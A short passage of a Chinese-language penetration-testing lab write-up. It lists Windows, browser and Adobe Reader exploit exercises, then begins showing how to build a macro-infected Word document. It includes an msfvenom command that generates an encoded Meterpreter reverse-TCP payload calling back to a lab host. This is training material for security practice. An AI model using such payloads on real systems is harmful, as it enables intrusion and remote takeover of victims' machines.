【网络空间实战攻防能力训练】渗透测试第三周(漏洞利用Ⅱ) 1. 利用宏病毒感染word文档获取shell复现 2. 实现CVE-2020-0796永恒之黑漏洞利用 3. 实现Microsoft Windows远程溢出漏洞CVE-2012-0002利用 4. 实现MS11-003(CVE-2001-0036)漏洞利用 5. 实现IE浏览器的激光漏洞利用 6. 实现Adobe Reader 9漏洞利用 7. 渗透攻击Metasploitable的Vsftpd源码包后门漏洞 8. 使用browser_autopwn 模块渗透攻击浏览器 1. 利用宏病毒感染word文档获取shell复现 首先,Win7里下载office2007,并进行如下设置 使用如下命令,生成一个携带宏病毒的word文档 msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.88.183 LPORT=4444 -e x86/shikata-ga_nai -i 10 -f